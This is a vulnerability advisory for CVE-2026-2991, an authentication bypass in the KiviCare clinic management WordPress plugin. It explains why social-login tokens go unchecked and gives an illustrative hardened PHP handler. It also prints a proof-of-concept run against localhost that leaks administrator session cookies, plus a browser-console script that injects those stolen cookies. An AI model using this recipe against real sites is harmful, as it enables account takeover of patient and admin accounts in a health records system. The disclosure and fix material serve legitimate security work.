CVE-2026-2991: KiviCare authentication bypass
CVE-2026-2991 is an authentication bypass vulnerability in the KiviCare – Clinic & Patient Management System (EHR) WordPress plugin affecting all versions up to and including 4.1.2.
The plugin exposes a public REST endpoint at /wp-json/kivicare/v1/auth/patient/social-login that authenticates users via social login. The patientSocialLogin() function accepts an email address and an access token but never validates the token against the claimed social provider. Any unauthenticated attacker can therefore log in as any registered patient by supplying only that patient's email address and an arbitrary string as the token.
Additionally, WordPress authentication cookies are issued before the patient-role check is enforced. This means that for non-patient accounts (including administrators), the response returns HTTP 403 but still includes valid Set-Cookie headers — leaking a replayable admin session to the attacker.
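The two defects described above (an unverified provider token, and cookies issued before the role check) are fixed by the ordering shown in this illustrative hardened handler. It is an added example and not KiviCare's code: the parameter names (email, access_token, login_type), the KC_PATIENT_ROLE and KC_GOOGLE_CLIENT_ID constants, and the Google tokeninfo verification flow are assumptions, and only the Google provider is shown.

```php
<?php
// Illustrative hardened replacement for a social-login REST handler (not KiviCare's code).
// KC_PATIENT_ROLE and KC_GOOGLE_CLIENT_ID are placeholder constants for this example.

function kc_example_verify_google_token( string $token, string $email ): bool {
    // Ask the provider who the token belongs to instead of trusting the caller's claim.
    $resp = wp_remote_get(
        'https://oauth2.googleapis.com/tokeninfo?access_token=' . rawurlencode( $token ),
        array( 'timeout' => 10 )
    );
    if ( is_wp_error( $resp ) || 200 !== wp_remote_retrieve_response_code( $resp ) ) {
        return false;
    }
    $info = json_decode( wp_remote_retrieve_body( $resp ), true );
    // The token must be issued to this application and must assert the very
    // email address the caller is trying to log in as.
    return is_array( $info )
        && isset( $info['aud'], $info['email'], $info['email_verified'] )
        && hash_equals( KC_GOOGLE_CLIENT_ID, (string) $info['aud'] )
        && 'true' === (string) $info['email_verified']
        && 0 === strcasecmp( (string) $info['email'], $email );
}

function kc_example_patient_social_login( WP_REST_Request $request ) {
    $email = sanitize_email( (string) $request->get_param( 'email' ) );
    $token = (string) $request->get_param( 'access_token' );
    $type  = (string) $request->get_param( 'login_type' );

    // 1. Prove the caller controls the social identity before touching any account.
    if ( 'google' !== $type || ! kc_example_verify_google_token( $token, $email ) ) {
        return new WP_Error( 'kc_bad_token', 'Social token rejected.', array( 'status' => 401 ) );
    }
    $user = get_user_by( 'email', $email );
    if ( ! $user ) {
        return new WP_Error( 'kc_no_user', 'Unknown account.', array( 'status' => 401 ) );
    }
    // 2. Enforce the role BEFORE any cookie is issued, so a 403 for an admin or
    //    other non-patient account never carries Set-Cookie headers.
    if ( ! in_array( KC_PATIENT_ROLE, (array) $user->roles, true ) ) {
        return new WP_Error( 'kc_not_patient', 'This account is not a patient account.', array( 'status' => 403 ) );
    }
    // 3. Only now create the WordPress session.
    wp_set_auth_cookie( $user->ID, false, is_ssl() );
    return rest_ensure_response( array( 'status' => true, 'user_id' => $user->ID ) );
}
```

Returning a WP_Error with a status code lets the REST layer emit the 401/403 itself, with no session state created on the failure paths.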
https://github.com/joshuavanderpoll/CVE-2026-2991

CVE-2026-2991 — KiviCare Authentication Bypass
KiviCare Clinic & Patient Management System <= 4.1.2
────────────────────────────────────────────────────────────
[*] Target : http://localhost:8080
[*] Endpoint: /wp-json/kivicare/v1/auth/patient/social-login
────────────────────────────────────────────────────────────
[@] Checking KiviCare REST namespace...
[+] KiviCare REST namespace responded.
────────────────────────────────────────────────────────────
[*] Target email : [email protected]
[*] Login type : google
[*] Access token : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
────────────────────────────────────────────────────────────
[@] Sending social login request...
[*] HTTP 403
[@] 403 Forbidden — This account is not a patient account
────────────────────────────────────────────────────────────
[+] Secondary finding: auth cookies present on 403!
[@] Cookies were set before the role check. Replay them for a session.
────────────────────────────────────────────────────────────
[@] Auth cookies:
wordpress_37d007a56d816107ce5b52c10342db37 = admin%7C1774035330%7CmFfiKYj9ZTsCd8nVHrjryI0vMSb…
wordpress_logged_in_37d007a56d816107ce5b52c10342db37 = admin%7C1774035330%7CmFfiKYj9ZTsCd8nVHrjryI0vMSb…
────────────────────────────────────────────────────────────
[+] Paste into browser console on the target site:
// CVE-2026-2991 — inject stolen session cookies
(() => {
  document.cookie = "wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1774035330%7CmFfiKYj9ZTsCd8nVHrjryI0vMSbZc5GL12Qhg2XgjwN%7C9ff6f0a8f64112b6369e837edfd09f65811c3a34c55f8546b085b03e2e894d1d; path=/";
  document.cookie = "wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1774035330%7CmFfiKYj9ZTsCd8nVHrjryI0vMSbZc5GL12Qhg2XgjwN%7Ce036b5d44e0123a0a8f85ad194c217da534b9c0a7355905653b710f9b963326c; path=/";
  window.location.href = "http://localhost:8080/wp-admin/";
})();
CVSS score: 9.8 (Critical risk)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Complexity: low
Privileges: none
Affected: <=4.1.2
Patched: >4.1.2